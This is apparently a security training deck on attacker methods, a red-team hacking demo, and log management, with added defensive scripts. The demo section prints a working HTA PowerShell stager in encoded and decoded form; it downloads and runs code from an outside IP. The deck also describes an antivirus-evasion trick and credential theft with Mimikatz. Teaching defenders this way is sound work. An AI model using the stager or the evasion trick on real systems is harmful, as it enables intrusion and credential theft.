
10-D Academy Advanced ISO Course

Advanced ISO
10-D Security Training Academy
www.10dsecurity.com

10-D Security
Setting a Higher Level of Excellence in Information Security & Compliance Services
©2019 10-D, Inc. All Rights Reserved.

But first…

• Logistics
• Introductions
• Schedule
• Other Questions or Topics to cover?

“I like a teacher who gives you something to take home to think about besides homework.”
- Lily Tomlin as "Edith Ann"

But first…

1. Name
2. Title/Role/Location
3. How long you’ve been in your current role
4. Some topic you hope is covered
5. Something else about you

Course Agenda
1. Setting the Stage
2. Hacking Demo
3. Log Management
4. Baselining and Anomaly Detection
5. Incident Response
6. Dark Web
7. Business Continuity
8. Vendor Management
9. Politics
10. Wrap-Up

Section 1: Setting the Stage

Topics:
• Review of Prerequisite Material
• Know your Enemy
• What makes you/us a Target?
• Attack Methods
• What would you see?

“We have met the enemy and he is us.”
- Walt Kelly

Review

1. Role Description and Structure
2. Preventive Controls & Actions (Policies, risk assessments, access control, patch mgmt., vendor mgmt., change mgmt., training)
3. Detective Controls & Actions (Monitoring, SIEM)
4. Response Controls & Actions (Incident Response, Investigations, BC/DR)
5. Testing, Reporting and Intel
6. Tools & Methods

Know your Enemy

• Cyber-criminals
• Hacktivists
• Nation-states and militaries

What do They Want?

That depends:
• Cyber-criminals – Confidential Information/Identities
• Hacktivists – Attention/Retribution/Company Secrets
• Nation-states – Information/Access/Intellectual Property

“We don’t have anything anyone would want!”

Everyone is a target.
• Intended target
• Opportunity
• Resource

Why Us?

• Visible – Your brand is well known to the public
• Scan found you – Automated scanning came across your IPs
• Opportunistic or Dumb Luck – Phishing, employee web surfing, emails, social media, previous target, etc.

Attack Goals

• Installation of Malware
• Direct theft of information, such as passwords
• Direct monetary gain, such as ACH or Wire fraud
• Client Data (CC#, PII)
• Information to be used in future attacks (botnets)
• Denial of Service
• Parasitic – use of your resources

Status Quo Security

• Compromise happens in seconds
• Data exfiltration happens in hours
• Often goes undetected for months
• Containment can take weeks
• Unsustainable model

How do you attack a fortress?

Have someone let you in…


Attack Methods

• Network attack (remote)
• Social Engineering
  – Phishing, Spear-phishing, Whaling
  – Pretext calling
  – On-premise methods:
    • Pretexting (e.g., lost traveler, prospective customer, exterminator)
    • Media drops
    • Network attachment
    • Information gathering
    • Dumpster Diving

How many phishing emails does it take to get to the Tootsie Roll center of your network?

• 22% of recipients open phishing emails at least once in a year
• 4% will click on an average phishing email
• A phishing campaign sent to 50 people will usually net 2-4 victims
• Time-to-first-click averages 16 minutes

Source: Verizon Enterprise, “2018 Data Breach Investigations Report”

Not an “m” but an “r” and “n” together
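
Added example, not from the course slides: a small Python triage helper that flags sender domains using the lookalike trick the slide shows, where "rn" is typed in place of "m". The brand domain acmebank.com, the From: headers and the confusable table are constructed for illustration, and the registrable-domain split assumes a one-label public suffix (real code should use the Public Suffix List).

```python
"""Lookalike-domain triage for the "rn" in place of "m" trick.

Added example, not part of the 10-D course material. The brand domain,
the From: headers and the confusable table below are constructed for
illustration; the registrable-domain split is a deliberate simplification.
"""
from __future__ import annotations

import re

# Character sequences a reader tends to perceive as a different single
# character. Multi-character entries come first so they collapse before
# the single-character substitutions run. (Constructed, not exhaustive.)
CONFUSABLES = [
    ("rn", "m"),   # the slide's case: acrnebank reads as acmebank
    ("vv", "w"),
    ("cl", "d"),
    ("0", "o"),
    ("1", "l"),
    ("3", "e"),
    ("5", "s"),
]

# Constructed: the institution's legitimate sending domain(s).
BRAND_DOMAINS = ["acmebank.com"]

# Constructed From: header values a mail filter or analyst might see.
SAMPLE_FROM = [
    "Acme Bank Alerts <alerts@acmebank.com>",
    "Acme Bank Alerts <alerts@acrnebank.com>",
    "Acme Bank Security <security@acmebank.co>",
    "Acme Bank <noreply@mail.acmebank.com>",
    "IT Helpdesk <help@acrnebank-support.net>",
    "Newsletter <news@example.org>",
]


def skeleton(label: str) -> str:
    """Collapse a domain label to the shape a reader sees at a glance."""
    s = label.lower()
    for seq, looks_like in CONFUSABLES:
        s = s.replace(seq, looks_like)
    return s


def registrable(domain: str) -> tuple[str, str]:
    """Split 'mail.acmebank.com' into ('acmebank', 'com').

    Assumes a one-label public suffix; production code should use the
    Public Suffix List so that 'acmebank.co.uk' is split correctly.
    """
    labels = domain.lower().strip(".").split(".")
    if len(labels) < 2:
        raise ValueError(f"not a fully qualified domain: {domain!r}")
    return labels[-2], labels[-1]


def classify(sender_domain: str, brand_domains: list[str]) -> str:
    """Return 'exact', 'lookalike' or 'unrelated' for one sender domain."""
    name, tld = registrable(sender_domain)
    brands = [registrable(b) for b in brand_domains]
    if (name, tld) in brands:
        return "exact"
    for bname, _btld in brands:
        # Same perceived shape (acrnebank.com), same name on another TLD
        # (acmebank.co), or the brand embedded in a longer label
        # (acrnebank-support.net) all merit a closer look.
        if skeleton(bname) in skeleton(name):
            return "lookalike"
    return "unrelated"


def sender_domain(from_header: str) -> str:
    """Extract the domain from 'Name <user@host>' or 'user@host'."""
    m = re.search(r"@([A-Za-z0-9.-]+)>?\s*$", from_header.strip())
    if not m:
        raise ValueError(f"no address found in {from_header!r}")
    return m.group(1)


def triage(from_headers: list[str], brand_domains: list[str]) -> list[tuple[str, str]]:
    """Return (domain, verdict) for every header that needs a human look."""
    flagged = []
    for header in from_headers:
        domain = sender_domain(header)
        verdict = classify(domain, brand_domains)
        if verdict == "lookalike":
            flagged.append((domain, verdict))
    return flagged


if __name__ == "__main__":
    for domain, verdict in triage(SAMPLE_FROM, BRAND_DOMAINS):
        print(f"{verdict:10s} {domain}")
```

Because both the brand name and the candidate are reduced to the same skeleton before comparison, the check also catches other substitutions in the table (vv for w, 0 for o) without a separate rule for each.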

Two Questions

1. What is your institution doing to defend its information?
2. How would your institution know if the network were breached?

Section 2: Hacking Demo

Topics:
• Red Team – Blue Team
• Demo
• Following the Kill Chain

“He who does not prevent a crime when he can, encourages it.”
- Lucius Annaeus Seneca

Cyber Attack Lifecycle

Reconnaissance
• Social Networks
• Phone calls
• Port scans
• Shoulder surfing
• Wifi scans
• Packet sniffer

Weaponization
• .doc
• .exe
• .ps1
• .hta
• .js
• .bat
• .pdf
• .xls/.doc

Delivery
• Email
• WWW
• IM/chat
• USB/CD/DVD
• Social Engineering

Initial Exploitation
• “Click”
• Attachment opened
• Shell access

Install & Escalate (Command & Control)
• Elevate Privileges
• Steal user credentials
• Root kits
• Establish Persistence

Expand Access
• Recon network
• ID target data
• Move laterally

Objective
• Steal data
• System control
• DoS
• Manipulate systems/data
• Launch subsequent attacks

Slide image (locations shown): Stanford; East Wahoo, NJ; Boulder, Colorado

Hack Demo – Scott Lincoln

Check the time before and after – see how long this takes…

Real-time Video of breach

Will Scott Click?

This attack example uses an open source tool (Metasploit) that Penetration
Testers and Red Teamers use to test networks.

These examples show an HTML Application (HTA) as the delivery method, but the
payload could be PS1, JAV, EXE, COM, BAT, etc.

Tip: Blocking all file types except what is explicitly allowed will give the
network defender a better chance of thwarting an attack.
Hack Demo – Payload


The source code of the HTA shows the attacker is using Windows’ PowerShell
platform:
<html><head><script>var c= 'powershell.exe -NoP -sta -NonI -W Hidden -Enc
WwBTAFkAcwB0AGUATQAuAE4ARQB0AC4AUwBFAFIAdgBpAEMAZQBQAE8ASQBuAHQATQBBAG4AYQBnAGUAcgBdADo
AOgBFAFgAUABlAGMAVAAxADAAMABDAE8ATgBUAGkAbgBVAEUAIAA9ACAAMAA7ACQAVwBDAD0ATgBFAFcALQBPAEIA
SgBlAEMAdAAgAFMAeQBTAFQARQBNAD4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AVAA7ACQAdQA9ACcATQBvAHoAa
QBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAV
AByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAk
AFcAYwAuAEgAZQBBAEQARQByAHMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkA
FcAYwAuAFAAUgBPAHgAeQAgAD0AIABbAFMAeQBzAHQARQBtAC4ATgBFAFQALgBXAGUAYgBSAEUAUQB1AGUAUwB0AF
0AOgA6AEQAZQBmAEEAVQBsAFQAVwBlAEIAUAByAG8AWAB5ADsAJABXAEMALgBQAFIATwB4AFkALgBDAFIARQBkAEUA
bgBUAGkAYQBsAHMAIAA9ACAAWwBTAHkAcwBUAGUATQAuEE4ARQBUAC4AQwByAEUAZABlAG4AdABJAGEATABDAGEA
QwBIAEUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAEQARQBuAFQAaQBhAEwAUwA7ACQAS
wA9ACcAZAA2AGUAMQBhAGIANQA5ADEAOAA0ADYAYgAwADkAMQAzADEAMgBkADYAZAA2AGEAMwBmADUAZQA2A
GMAMABjACcAOwAkAEkAPQAwADsAWwBDAEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAYQBSAFsAXQBdACgAJABXA
EMALgBEAG8AVwBuAGwATwBBAGQAUwBUAHIASQBuAEcAKAAiAGgAdAB0AHAAOgAvAC8ANAA1AC4AMwAzAC4AMQA
wAC4ANwA6ADgAMAAvAGkAbgBkAGUAeAAuAGEAcwBwACIAKQApACkAfAAlAHsAJABfAC0AYgBYAE8AcgAkAGsAWwAkA
GkAKwArACUAJABrAC4ATABFAG4AZwB0AGgAXQB9ADsASQBFAFgAIAAoACQAYgAtAGoATwBpAG4AJwAnACkA'
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>

Hack Demo – Payload

The source code of the HTA shows the attacker is using Windows’ PowerShell
platform (with Base-64 code converted to ASCII):

<html><head><script>var c= 'powershell.exe -NoP -sta -NonI -W Hidden -Enc
[SYsteM.NEt.SERviCePOIntMAnager]::EXPecT100CONTinUE = 0;$WC=NEW-OBJeCt
SySTEM>Net.WebClienT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like
Gecko';$Wc.HeADErs.ADD('User-Agent',$u);$Wc.PROxy =
[SystEm.NET.WebREQueSt]::DefAUlTWeBProXy;$WC.PROxY.CREdEnTials =
[SysTeM.NET.CrEdentIaLCaCHE]::DeFauLTNEtwOrkCreDEnTiaLS;$K='d6e1ab591846b091312d6d6a3f5e6c0c';$I
=0;[CHaR[]]$B=([chaR[]]($WC.DoWnlOAdSTrInG("http://45.33.10.7:80/index.asp")))|%{$_-
bXOr$k[$i++%$k.LEngth]};IEX ($b-jOin'')'
new ActiveXObject('WScript.Shell').Run(c);</script></head><body><script>self.close();</script></body></html>

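As an added defender-side example (not part of the course material), the Python below does what an analyst does with the two payload slides above: it pulls the -Enc argument out of an HTA launcher, reverses the UTF-16LE/Base-64 encoding even when the blob has been line-wrapped, and flags the indicators worth triaging (hidden window, no-profile flags, remote download, IEX, XOR second stage, WScript.Shell launch, embedded URLs). The HTA and its encoded command are constructed samples wrapping a harmless command, not the demo's payload.

```python
import base64
import re

# Constructed sample HTA (not the course's demo payload): the same launcher
# pattern as the slides, wrapping a harmless encoded PowerShell command.
SAMPLE_COMMAND = "Write-Output 'constructed sample'; $x = (1..3) -join ','"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode("ascii")
SAMPLE_HTA = (
    "<html><head><script>var c= 'powershell.exe -NoP -sta -NonI -W Hidden -Enc "
    + SAMPLE_ENCODED + "'\n"
    "new ActiveXObject('WScript.Shell').Run(c);</script></head>"
    "<body><script>self.close();</script></body></html>"
)

# -EncodedCommand and its abbreviations (-e, -ec, -en, -enc ...). Whitespace is
# allowed inside the Base-64 run so a blob that was line-wrapped, as on the
# slide, is still captured whole. -ExecutionPolicy / -ep do not match.
_ENC_RE = re.compile(r"(?<!\S)-e(?:c|n[a-z]*)?\s+((?:[A-Za-z0-9+/=]\s*)+)", re.IGNORECASE)

# Indicator name -> pattern, evaluated over the HTA text plus the decoded command.
INDICATORS = {
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "no profile / non-interactive": r"-nop\b|-noprofile\b|-noni\b|-noninteractive\b",
    "remote download": r"downloadstring|downloadfile|downloaddata|invoke-webrequest|net\.webclient",
    "in-memory execution (IEX)": r"\biex\b|invoke-expression",
    "xor-decoded second stage": r"-bxor\b",
    "HTA launches a shell": r"wscript\.shell",
}
_URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def extract_encoded_command(hta_text: str):
    """Return the Base-64 blob passed to -Enc (whitespace removed), or None."""
    m = _ENC_RE.search(hta_text)
    return re.sub(r"\s+", "", m.group(1)) if m else None


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is Base-64 over UTF-16LE. An odd byte count (a mistyped
    blob) is padded so the analyst still sees the bulk of the command."""
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raw += b"\x00"
    return raw.decode("utf-16-le", errors="replace")


def analyze_hta(hta_text: str) -> dict:
    """Decode the launcher and report which indicators it carries."""
    blob = extract_encoded_command(hta_text)
    decoded = decode_encoded_command(blob) if blob else ""
    haystack = hta_text + "\n" + decoded
    found = [name for name, pat in INDICATORS.items()
             if re.search(pat, haystack, re.IGNORECASE)]
    if blob:
        found.append("encoded command")
    return {
        "encoded_command": blob,
        "decoded": decoded,
        "indicators": found,
        "urls": _URL_RE.findall(haystack),
    }


if __name__ == "__main__":
    report = analyze_hta(SAMPLE_HTA)
    print("decoded :", report["decoded"])
    print("flags   :", ", ".join(report["indicators"]))
    print("urls    :", report["urls"] or "none")
```

Run against the slide's own HTA text, the same function surfaces the DownloadString call, the IEX, the -bXOr loop and the 45.33.10.7 URL as the indicators to block and hunt for.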
Hack Demo – Tricking AV

Simple changes to malicious code may fool AV. In this example, taking a
known Word macro and changing:
string = “first part of bad code” + “second part of bad code”
Run string
To…
string = “first part of bad code” & “second part of bad code”
Run string
…doesn’t change the code’s behavior, but it is enough to trick a common AV
system into not detecting it.

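As an added example (not from the course or any AV product), the Python below shows why a byte-exact signature misses the + to & rewrite on this slide, and two ways a detection engine closes that gap: normalising the macro source before matching (so the three spellings hash to one signature), and resolving what literal string actually reaches Run. The macro text is a constructed stand-in built from the slide's placeholder strings.

```python
import hashlib
import re

# Three constructed macro variants built from the slide's pattern. They behave
# identically; only the spelling of the string concatenation differs.
MACRO_PLUS = '''Sub AutoOpen()
    Dim s As String
    s = "first part of bad code" + "second part of bad code"
    Run s
End Sub'''
MACRO_AMP = MACRO_PLUS.replace('" + "', '" & "')
MACRO_CONT = MACRO_PLUS.replace('" + "', '" + _\n        "')   # VBA line continuation

# What a byte-exact signature looks like: the literal text seen in the first sample.
NAIVE_SIGNATURE = '"first part of bad code" + "second part of bad code"'

_CONTINUATION_RE = re.compile(r"[ \t]_[ \t]*\r?\n[ \t]*")
_CONCAT_RE = re.compile(r'"([^"]*)"\s*[+&]\s*"([^"]*)"')


def normalize_vba(src: str) -> str:
    """Canonical form of a macro: continuations joined, comment lines dropped,
    adjacent string literals folded whether joined by + or &, whitespace
    collapsed, case folded. Cosmetic rewrites map to the same text."""
    src = _CONTINUATION_RE.sub(" ", src)
    kept = []
    for line in src.splitlines():
        line = line.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue
        kept.append(line)
    text = "\n".join(kept)
    prev = None
    while prev != text:          # fold "a" + "b" + "c" in as many passes as needed
        prev = text
        text = _CONCAT_RE.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
    return re.sub(r"\s+", " ", text).lower()


def matches_naive(src: str) -> bool:
    """The brittle check: exact substring of the first sample seen."""
    return NAIVE_SIGNATURE in src


def signature(src: str) -> str:
    """Hash of the canonical form; identical for all three variants."""
    return hashlib.sha256(normalize_vba(src).encode("utf-8")).hexdigest()


def resolve_run_targets(src: str):
    """Behaviour-oriented view: which literal strings end up passed to Run or
    Shell after constant folding, regardless of how they were spelled."""
    norm = normalize_vba(src)
    assigned = dict(re.findall(r'\b(\w+) = "([^"]*)"', norm))
    return [(call, assigned.get(var, var))
            for call, var in re.findall(r"\b(run|shell)\s+(\w+)", norm)]


if __name__ == "__main__":
    for name, macro in (("plus", MACRO_PLUS), ("amp", MACRO_AMP), ("cont", MACRO_CONT)):
        print(f"{name:4} naive={matches_naive(macro)!s:5} sig={signature(macro)[:16]} "
              f"runs={resolve_run_targets(macro)}")
```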
Hack Demo – First Foothold


Once Scott clicks to launch the malicious code, it is injected into memory
without touching disk, likely avoiding an Antivirus scan. Once running, it
checks in with the attacker.

Attacker’s screen view below:

Hack Demo – Mimikatz tool


The attacker will load a memory scraping script to parse out the password
hashes and plaintext values. Mimikatz is a standalone memory scraping tool
that has been incorporated into nearly every attack platform used by
attackers and defenders alike.

Hack Demo – Mimikatz tool

In this screen shot the attackers have executed mimikatz. See anything
noteworthy?

Hack Demo – Mimikatz tool

It is not unusual to find passwords of users who have previously used the
system. Unless the pagefile is cleared at shutdown the contents often survive
reboots.

Hack Demo – get_user

Using the information just found for the two user accounts, the attacker next
has the agent load a script (get_user) that is used to find out more about
users and their associated access, this example for user “pfrye”…

Results in…

Hack Demo – get_domain_controller

Next, the attacker has the agent load a script (get_domain_controller) to find
out more about the target’s Active Directory environment.

Results in…

Credential Guard

Introduced in Windows 10 Enterprise and Windows Server 2016, Windows Defender
Credential Guard uses virtualization-based security to isolate secrets so that
only privileged system software can access them. Unauthorized access to these
secrets can lead to credential theft attacks, such as Pass-the-Hash or
Pass-The-Ticket. Windows Defender Credential Guard prevents these attacks by
protecting NTLM password hashes, Kerberos Ticket Granting Tickets, and
credentials stored by applications as domain credentials.
- Microsoft https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard

Does Windows 10 / 2016 Fix It?

Anytime a vulnerability is fixed, attackers will look for different attack vectors.
Increasingly they look for options that allow them to “live off the land,” taking
advantage of existing applications or usage.

Nessus example
• Authenticated scans use Domain Administrator privileges
• Commonly set up with an account that remains active indefinitely, with a
password that may not expire
• Usually able to access most if not all systems
• A compromised system may be tasked with waiting for a scan, to capture the
credentials used for the Authenticated scan

DEMO…

Does Windows 10 / 2016 Fix It?

Many institutions do not have a vulnerability scanner (e.g., Nessus), but that
does not entirely remove the risk. The same attack platform we just looked at
(“Responder”) can also respond to name resolution requests and pretend to
be the requested service (a “poisoning attack”). In this example:
• The user will attempt to access a file share that is unavailable (e.g., a typo or the server is down)
• “Responder” will claim to be the requested service, and will ask for the user’s authentication credentials (username & password hash)
• Like before, the attacker will have to crack the password hashes separately

DEMO…

Does Windows 10 / 2016 Fix It?

What is the attacker taking advantage of for these attacks to work?

• User had to “let them in” to their computer (clicked…) for first foothold
• Weak passwords that could be compromised (cracked)
• Time… The attacker may have to be on the compromised system a while to harvest the credentials
• Protocols/services in use that may not be needed*, including:
– NetBIOS (In particular, the NetBIOS Name Service (NBNS))
– LLMNR (Link-Local Multicast Name Resolution)

*For more info: https://10dsecurity.com/saying-goodbye-netbios/ and
http://woshub.com/how-to-disable-netbios-over-tcpip-and-llmnr-using-gpo/
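The two name-resolution services listed above are what the Responder demo answers on, so the practical control is to confirm they are off on Windows 10 / 2016 hosts and switch them off where they are not needed. The following PowerShell is an added example written for this course page (it is not 10-D's code and not taken from the linked articles). It assumes an elevated session on the host being checked; the function names are hypothetical, while the DNSClient policy value (EnableMulticast) and the Win32_NetworkAdapterConfiguration SetTcpipNetbios method are the standard Windows settings. In a domain the same settings are normally pushed by GPO, as the linked articles describe; this script is for auditing a host and for one-off remediation.

```powershell
# Added example (not part of the 10-D course material): audit, and optionally disable,
# LLMNR and NetBIOS over TCP/IP on a Windows 10 / Server 2016 host.
# Run in an elevated PowerShell session.

# LLMNR is governed by the DNS Client policy value EnableMulticast (0 = disabled).
$LlmnrKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

function Get-LegacyNameResolutionStatus {
    # Returns one object per IP-enabled adapter, carrying the host-wide LLMNR policy
    # state alongside the adapter's NetBIOS setting, so it can be compared to policy
    # before anything is changed.
    $llmnr = Get-ItemProperty -Path $LlmnrKey -Name EnableMulticast -ErrorAction SilentlyContinue
    $llmnrDisabled = ($null -ne $llmnr -and $llmnr.EnableMulticast -eq 0)

    # TcpipNetbiosOptions: 0 = use DHCP-supplied setting, 1 = enabled, 2 = disabled
    Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            [pscustomobject]@{
                Adapter        = $_.Description
                NetBiosOption  = $_.TcpipNetbiosOptions
                NetBiosEnabled = ($_.TcpipNetbiosOptions -ne 2)
                LlmnrDisabled  = $llmnrDisabled
            }
        }
}

function Disable-LegacyNameResolution {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()

    if ($PSCmdlet.ShouldProcess('LLMNR', 'Disable via DNSClient policy value')) {
        if (-not (Test-Path $LlmnrKey)) { New-Item -Path $LlmnrKey -Force | Out-Null }
        Set-ItemProperty -Path $LlmnrKey -Name EnableMulticast -Value 0 -Type DWord
    }

    # Disable NetBIOS over TCP/IP on every IP-enabled adapter.
    # SetTcpipNetbios returns 0 on success and 1 when a reboot is required.
    Get-CimInstance -ClassName Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = TRUE' |
        ForEach-Object {
            if ($PSCmdlet.ShouldProcess($_.Description, 'Disable NetBIOS over TCP/IP')) {
                $result = Invoke-CimMethod -InputObject $_ -MethodName SetTcpipNetbios `
                    -Arguments @{ TcpipNetbiosOptions = 2 }
                if ($result.ReturnValue -gt 1) {
                    Write-Warning "SetTcpipNetbios returned $($result.ReturnValue) on $($_.Description)"
                }
            }
        }
}

# Usage: review first, then remediate (add -WhatIf to preview the changes).
Get-LegacyNameResolutionStatus | Format-Table -AutoSize
# Disable-LegacyNameResolution -WhatIf
```

Run the status function across servers first; NetBIOS may still be needed by older applications, which is why the deck's footnote says "may not be needed" rather than "never needed". Turning these off removes the poisoning path, but it does nothing about the other item on the slide, the long-lived scanner or service account with Domain Admin rights, which has to be addressed separately (least privilege for the scan account, credential rotation).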

Hack Demo – Attack Status

1. What information do the attackers now have?

2. What could they do with it?

3. What might trip up the attackers or impede their efforts?

4. If you were the attacker, what could you do to avoid detection or losing
your foothold into the target network?

Hack Demo – Red Team Persistence

The attacker has only one agent loaded, and could lose it at any time. They
will want to get a reliable on-going entry point.
Why might a Domain Controller make an attractive target?

Hack Demo – Red Team Persistence

The attacker connects to the Domain Controller and obtains details:

Hack Demo – Red Team Persistence

The attacker sets up a persistence mechanism using the built-in Windows
Task Scheduler to launch a new agent every day at 9:00 a.m.
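A scheduled task like the one in the demo leaves two records a defender can check: the task itself in the task store, and (if auditing is on) Security event 4698, "A scheduled task was created". The PowerShell below is an added example for this page, not 10-D's demo code. It assumes rights to read the task store and the Security log on the target, a hypothetical DC name DC01 in the usage lines, and a constructed list of action patterns that rarely belong in a legitimate recurring task; the function names are also hypothetical.

```powershell
# Added example (not part of the 10-D course material): hunt for scheduled-task
# persistence on a server such as a Domain Controller.

function Get-SuspiciousScheduledTask {
    [CmdletBinding()]
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$NewerThanDays = 30
    )
    # Constructed list: action fragments that seldom belong in a legitimate recurring task.
    $suspiciousAction = @(
        'powershell(\.exe)?\s.*-(enc|encodedcommand|w(indowstyle)?\s+hidden|nop)',
        'cmd(\.exe)?\s+/c', 'mshta', 'rundll32', 'regsvr32', '[wc]script',
        '\\Users\\', '\\Temp\\', '\\AppData\\', 'https?://'
    )
    $cutoff  = (Get-Date).AddDays(-$NewerThanDays)
    $session = New-CimSession -ComputerName $ComputerName
    try {
        foreach ($task in Get-ScheduledTask -CimSession $session) {
            $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
            $daily   = $task.Triggers | Where-Object { $_.CimClass.CimClassName -eq 'MSFT_TaskDailyTrigger' }
            $reasons = @()
            if ($suspiciousAction | Where-Object { $actions -match $_ }) { $reasons += 'suspicious action' }
            if ($task.Principal.UserId -match '(SYSTEM|S-1-5-18)$' -and $task.TaskPath -notlike '\Microsoft\*') {
                $reasons += 'runs as SYSTEM outside \Microsoft\'
            }
            # Date is the registration time recorded in the task XML (a string, may be empty).
            if ($task.Date -and [datetime]$task.Date -gt $cutoff) {
                $reasons += "registered after $($cutoff.ToShortDateString())"
            }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Computer = $ComputerName
                    Task     = $task.TaskPath + $task.TaskName
                    Author   = $task.Author
                    RunAs    = $task.Principal.UserId
                    DailyAt  = if ($daily) { ($daily | ForEach-Object { ([datetime]$_.StartBoundary).ToString('HH:mm') }) -join ',' } else { '' }
                    Actions  = $actions
                    Reasons  = $reasons -join ', '
                }
            }
        }
    }
    finally { Remove-CimSession $session }
}

function Get-ScheduledTaskCreationEvent {
    # Security event 4698 is written only when "Audit Other Object Access Events"
    # (success) is enabled. The event carries the task XML, so the action can still be
    # reviewed after the task itself has been deleted.
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$Days = 30
    )
    $filter = @{ LogName = 'Security'; Id = 4698; StartTime = (Get-Date).AddDays(-$Days) }
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            [pscustomobject]@{
                Time     = $_.TimeCreated
                Creator  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                TaskName = $data.TaskName
                Command  = ([xml]$data.TaskContent).Task.Actions.Exec.Command
            }
        }
}

# Usage (DC01 is an assumed host name):
# Get-SuspiciousScheduledTask -ComputerName DC01 | Format-Table -AutoSize
# Get-ScheduledTaskCreationEvent -ComputerName DC01 | Format-Table -AutoSize
```

The first function is a point-in-time check and will produce some benign hits (vendor tasks in non-Microsoft paths), so baseline it once and diff from then on. The second is the better long-term control: with 4698 forwarded to the central log store discussed in the next section, task creation on a Domain Controller can be alerted on at the time it happens, which matters given the recap's point that the whole chain took under 30 minutes.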

Hack Demo – Attack Recap

1. Attacker compromised a workstation
2. Attacker obtained user credentials, including a Domain Admin
3. Attacker obtained network information, including Domain Controller info
4. Attacker installed agent on Domain Controller and set up persistence
5. Network activity used only port 80 (http – common web access)
6. Initial “click” didn’t require Local Admin access, but it did hasten the compromise

Total time to complete these tasks: Under 30 minutes

Total time to complete these tasks if Local Admin hadn’t been present: 2-4 hrs

Hack Demo – How it Could End

January 19, 2019

Joe Customer
123 Any Street
Springfield, IL

Kill Chain

Section 3: Log Management

Topics:
• Requirements
• Log Inputs
• Issues to Consider
• Retention and Archival
• Log Management Solutions
• Log Settings
• Review, Correlation and Alerting

“Being able to see an activity log of where a kid has been going on the
Internet is a good thing.”
- Bill Gates

Log Management

Definitions:
• Log: A log is a record of the events occurring within an organization’s
systems and networks. Logs are composed of log entries; each entry
contains information related to a specific event that has occurred within a
system or network.
• Log Management: Log management is essential to ensuring that
computer security records are stored in sufficient detail for an appropriate
period of time.

Log Management

Why Log?
• Investigate security incidents, policy violations, fraudulent activity, and
operational problems
• Auditing and forensic analysis, supporting internal investigations,
establishing baselines, and identifying operational trends and long-term
problems
• Establish baselines for anomaly detection
• Regulatory compliance and guidance –
– Gramm-Leach-Bliley Act
– FFIEC Information Security IT Booklet, II.C.22, III.C
– Sarbanes-Oxley Act (SOX) of 2002.14
– Payment Card Industry Data Security Standard (PCI DSS)
– NY Dept. of Financial Services, 23 NYCRR Part 500

Log Management

From the FFIEC:

Network and host activities typically are recorded on the host and sent across
the network to a central logging repository… Management should have
effective log retention policies that address the significance of maintaining
logs for incident response and analysis needs.

Log files are critical to the successful investigation and prosecution of security
incidents and can potentially contain sensitive information. Intruders often
attempt to conceal unauthorized access by editing or deleting log files.
Therefore, institutions should strictly control and monitor access to log files
whether on the host or in a centralized logging repository.
(IT Examination Handbook – Information Security [III.C], September 2016)

Log Management – Possible Inputs

[Diagram: input assets (server, router, workstation, firewall/IDS/IPS; user info, database, core, helpdesk tickets, etc.) feeding log management]

• Antivirus
• Firewalls
• IDS/IPS
• VPN access
• Network devices (routers, switches)
• Network Access Control systems
• SAN and NAS devices
• Proxy/web content filters (Websense, Forcepoint, Blue Coat, etc.)
• Active Directory and other authentication servers
• Web servers (IIS or Apache)
• Email servers
• File servers

Log Management – Possible Inputs

[Diagram: input assets (server, router, workstation, firewall/IDS/IPS; user info, database, core, helpdesk tickets, etc.) feeding log management]

• Important applications
– Accounting software
– Core banking application
– Internet banking
– ACH/Wires
• Databases
• Virtual host servers
• Physical security systems
• Environmental
• Call Center / Help Desk
• Threat Intelligence
• Other (ATMs, DVRs, VoIP, etc.)

Log Management – What to Log

[Diagram: the same input assets, each producing a log file that is gathered by a central log server]

• Log management must start with having a detailed network inventory. YOU MUST KNOW YOUR ENVIRONMENT.
• In a perfect world, collect logs from everything. In most small to mid-sized environments, start with the critical systems such as firewalls and servers. Then, move on to endpoints (desktops and laptops) and applications.

Log Management Considerations

[Diagram: input assets, each producing a log file that is gathered by a central log server]

• Retention and Archival
• Storage Constraints (log volume)
• Network Constraints
• Protecting the “CIA” of logs
• Disparate Systems (incompatibility)
• Ensuring log data is regularly reviewed
• Forensic investigator expectations

More from the FFIEC:

[Diagram: log files gathered by a central log server]

“Regardless of the method of log management, management should develop
processes to collect, aggregate, analyze, and correlate security information.
Policies should define retention periods for security and operational logs.
Institutions maintain event logs to understand an incident or cyber event after
it occurs. Monitoring event logs for anomalies and relating that information
with other sources of information broadens the institution's ability to
understand trends, react to threats, and improve reports to management and
the board.”
[IT Examination Handbook – Information Security, Sept. 2016]

Establish Policies and Procedures

